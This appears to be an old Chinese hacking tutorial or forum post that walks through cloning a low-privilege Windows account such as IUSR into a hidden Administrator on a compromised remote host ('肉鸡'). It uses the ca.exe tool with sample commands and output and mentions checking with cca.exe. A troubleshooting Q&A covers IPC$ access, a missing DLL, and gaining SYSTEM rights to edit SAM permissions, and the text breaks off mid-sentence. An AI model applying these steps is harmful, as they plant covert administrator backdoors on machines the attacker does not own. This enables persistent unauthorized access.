利用SA.exe 将Iusr_victim克隆为Administrator。 

C:\>ca \\192.168.0.1 test test iusr_victim password 
Clone Administrator, by netXeyes 2002/04/06 
Written by netXeyes 2002, dansnow@21cn.com 

Connect 192.168.0.1 ....OK 
Get SID of iusr_victim ....OK 
Prepairing ....OK 
Processing ....OK 
Clean Up ....OK 

这时，iusr_victim就成为了超级用户，并有具有和Administrator同样的设置(桌面、菜单等等）。 

注：在ca \\192.168.0.1 test test iusr_victim password 中， 
192.168.0.1是肉鸡的IP地址；第一个test是你已经得到的肉鸡上的管理员用户名，第二个test是这个用户名的密码；iusr_victim是你想克隆的帐号，最后这个password就是你想给iusr_victim用的密码。 
------------------------------------------------------- 

用CCA.EXE检查是否存在克隆的帐号。 
不必改变ACL, 支持远程检查。 
C:\>cca \\192.168.0.29 administrator 123456 
Check Clone Account, by netXeyes 2002/04/29 
Written by netXeyes 2002, dansnow@21cn.com 

Connect 192.168.0.29 ....OK 
Prepairing ....OK 
Processing ....OK 
Checking .... 

Check Result: 

[DuDu] AS SAME AS [administrator] 
[Guest] AS SAME AS [administrator] 
[IUSR_RONG] AS SAME AS [administrator] 
[IWAM_RONG] AS SAME AS [administrator] 
[TEST] AS SAME AS [administrator] 
[xr] AS SAME AS [administrator] 
[Guest] AS SAME AS [DuDu] 
[IUSR_RONG] AS SAME AS [DuDu] 
这上面的DuDu，guest，IUSR_RONG等帐户就已经是被克隆为administrator啦
注意删除克隆账户是小心一定注意。我试验过很多机子删除之后administrator账户不再超管组


其实可隆帐号就是利用命名管道来把sam文件重置一份，前提是要对方的netbios端口，NETBEUI协议都装了，而且ipc$,admin$都要开着~~
我记得还有在注册表下修改用户的SID也可以的，只要把所要可隆的帐号的SID改成已知的那个号的SID 具体自己到网上找~~
1，使用ca时，出现connect **.**.**.** ...Error是怎么会事？ 
答：ca和cca需要目标开放ipc$，请确认可以与目标建立ipc$。参见“关于ipc$和空连接” 
2，使用ca时，出现“Processing....ERROR”是怎么会事？ 
答：这说明对方主机缺少文件msvcp60.dll，想办法传个过去放在系统目录下就可以了。 
3，克隆过程没有错误，但cca没有显示该帐号克隆成功，无法使用被克隆的帐号。 
答：这一般是因为对方主机是域控制器，注册表中sam结构不同，工具失效。暂时无法解决。 
4，手动克隆无法访问注册表SAM键怎么办？ 
答：在命令行方式，可以使用psu工具获得SYSTEM权限，从而访问SAM键。详见上面说明。 
在图形界面，运行regedt32.exe，找到SAM键并选中。“安全”子菜单栏里有一项“权限”，打开它。在里面设